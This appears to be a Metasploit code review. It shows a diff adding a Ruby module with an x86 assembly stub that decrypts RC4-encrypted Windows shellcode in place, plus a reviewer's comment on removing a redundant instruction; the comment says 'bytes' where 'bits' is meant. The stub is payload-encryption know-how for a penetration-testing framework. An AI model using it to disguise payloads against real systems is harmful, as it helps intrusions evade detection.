lib/msf/core/payload/windows/rc4.rb

```diff
@@ -0,0 +1,115 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+
+module Msf
+
+###
+#
+# RC4 decryption stub for Windows ARCH_X86 payloads
+#
+###
+
+module Payload::Windows::Rc4
+
+  #
+  # Register rc4 specific options
+  #
+  def initialize(*args)
+    super
+    register_advanced_options([ OptString.new("RC4PASSWORD", [true, "Password to derive RC4 key from"]) ], self.class)
+  end
+
+  #
+  # Generate assembly code that decrypts RC4 shellcode in-place
+  #
+
+  def asm_decrypt_rc4
+    asm = %Q!
+      ;-----------------------------------------------------------------------------;
+      ; Author: Michael Schierl (schierlm[at]gmx[dot]de)
+      ; Version: 1.0 (29 December 2012)
+      ;-----------------------------------------------------------------------------;
+      ; Input: EBP - Data to decode
+      ;        ECX - Data length
+      ;        ESI - Key (16 bytes for simplicity)
+      ;        EDI - pointer to 0x100 bytes scratch space for S-box
+      ; Direction flag has to be cleared
+      ; Output: None. Data is decoded in place.
+      ; Clobbers: EAX, EBX, ECX, EDX, EBP (stack is not used)
+
+      ; Initialize S-box
+        xor eax, eax           ; Start with 0
+      init:
+        stosb                  ; Store next S-Box byte S[i] = i
+        inc al                 ; increase byte to write (EDI is increased automatically)
+        jnz init               ; loop until we wrap around
+        sub edi, 0x100         ; restore EDI
+      ; permute S-box according to key
+        xor ebx, ebx           ; Clear EBX (EAX is already cleared)
+      permute:
+        add bl, [edi+eax]      ; BL += S[AL] + KEY[AL % 16]
+        mov edx, eax 
+        and dl, 0xF 
+        add bl, [esi+edx]
+        mov dl, [edi+eax]      ; swap S[AL] and S[BL]
+        xchg dl, [edi+ebx]
+        mov [edi+eax], dl
+        inc al                 ; AL += 1 until we wrap around
+        jnz permute
+      ; decryption loop
+        xor ebx, ebx           ; Clear EBX (EAX is already cleared)
+        xor edx, edx
```

Comment:
Good catch, @jvazquez-r7!
To be clear:
On line 42, eax gets zeroized, and only al gets changed thereafter.
On line 53, edx is populated by eax, so the upper 24 bytes of edx are zero.
On line 66, dl is populated.
On line 70, edx is used.
At line 70, the upper 24 bytes of edx are zero, and the bottom 8 are set.
TL;DR: Line 62 does not change the outcome of the code, so I removed it.